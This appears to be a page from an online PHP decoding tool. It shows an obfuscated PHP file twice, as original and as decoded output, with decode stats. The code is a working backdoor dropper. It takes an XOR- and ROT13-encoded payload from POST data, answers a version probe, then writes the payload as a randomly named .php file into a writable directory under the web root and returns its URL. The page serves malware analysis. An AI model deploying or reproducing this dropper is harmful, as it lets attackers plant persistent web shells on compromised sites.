Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $mczvfp = "atcyicsrvzithjdc";$cohjdysfhn = "";foreach ($_POST as $wsgmnbx => $zinmz)..
Decoded Output download
<?php $mczvfp = "atcyicsrvzithjdc";$cohjdysfhn = "";foreach ($_POST as $wsgmnbx => $zinmz){if (strlen($wsgmnbx) == 16 and substr_count($zinmz, "%") > 10){xztts($wsgmnbx, $zinmz);}}function xztts($wsgmnbx, $aubakwtv){global $cohjdysfhn;$cohjdysfhn = $wsgmnbx;$aubakwtv = str_split(rawurldecode(str_rot13($aubakwtv)));function lxgdg($aawaiclx, $wsgmnbx){global $mczvfp, $cohjdysfhn;return $aawaiclx ^ $mczvfp[$wsgmnbx % strlen($mczvfp)] ^ $cohjdysfhn[$wsgmnbx % strlen($cohjdysfhn)];}$aubakwtv = implode("", array_map("lxgdg", array_values($aubakwtv), array_keys($aubakwtv)));$aubakwtv = @unserialize($aubakwtv);if (@is_array($aubakwtv)){$wsgmnbx = array_keys($aubakwtv);$aubakwtv = $aubakwtv[$wsgmnbx[0]];if ($aubakwtv === $wsgmnbx[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function lidnjln($woyubir) {static $xwjuiwgsg = array();$qbqihan = glob($woyubir . '/*', GLOB_ONLYDIR);if (count($qbqihan) > 0) {foreach ($qbqihan as $woyub){if (@is_writable($woyub)){$xwjuiwgsg[] = $woyub;}}}foreach ($qbqihan as $woyubir) lidnjln($woyubir);return $xwjuiwgsg;}$ptnsmbbfk = $_SERVER["DOCUMENT_ROOT"];$qbqihan = lidnjln($ptnsmbbfk);$wsgmnbx = array_rand($qbqihan);$luxcfu = $qbqihan[$wsgmnbx] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($luxcfu, $aubakwtv);echo "http://" . $_SERVER["HTTP_HOST"] . substr($luxcfu, strlen($ptnsmbbfk));exit();}}} ?>
Did this file decode correctly?
Original Code
<?php $mczvfp = "atcyicsrvzithjdc";$cohjdysfhn = "";foreach ($_POST as $wsgmnbx => $zinmz){if (strlen($wsgmnbx) == 16 and substr_count($zinmz, "%") > 10){xztts($wsgmnbx, $zinmz);}}function xztts($wsgmnbx, $aubakwtv){global $cohjdysfhn;$cohjdysfhn = $wsgmnbx;$aubakwtv = str_split(rawurldecode(str_rot13($aubakwtv)));function lxgdg($aawaiclx, $wsgmnbx){global $mczvfp, $cohjdysfhn;return $aawaiclx ^ $mczvfp[$wsgmnbx % strlen($mczvfp)] ^ $cohjdysfhn[$wsgmnbx % strlen($cohjdysfhn)];}$aubakwtv = implode("", array_map("lxgdg", array_values($aubakwtv), array_keys($aubakwtv)));$aubakwtv = @unserialize($aubakwtv);if (@is_array($aubakwtv)){$wsgmnbx = array_keys($aubakwtv);$aubakwtv = $aubakwtv[$wsgmnbx[0]];if ($aubakwtv === $wsgmnbx[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function lidnjln($woyubir) {static $xwjuiwgsg = array();$qbqihan = glob($woyubir . '/*', GLOB_ONLYDIR);if (count($qbqihan) > 0) {foreach ($qbqihan as $woyub){if (@is_writable($woyub)){$xwjuiwgsg[] = $woyub;}}}foreach ($qbqihan as $woyubir) lidnjln($woyubir);return $xwjuiwgsg;}$ptnsmbbfk = $_SERVER["DOCUMENT_ROOT"];$qbqihan = lidnjln($ptnsmbbfk);$wsgmnbx = array_rand($qbqihan);$luxcfu = $qbqihan[$wsgmnbx] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($luxcfu, $aubakwtv);echo "http://" . $_SERVER["HTTP_HOST"] . substr($luxcfu, strlen($ptnsmbbfk));exit();}}}
Function Calls
None |
Stats
MD5 | 7befc6bc335a800d7dc1d1cebd383a9a |
Eval Count | 0 |
Decode Time | 148 ms |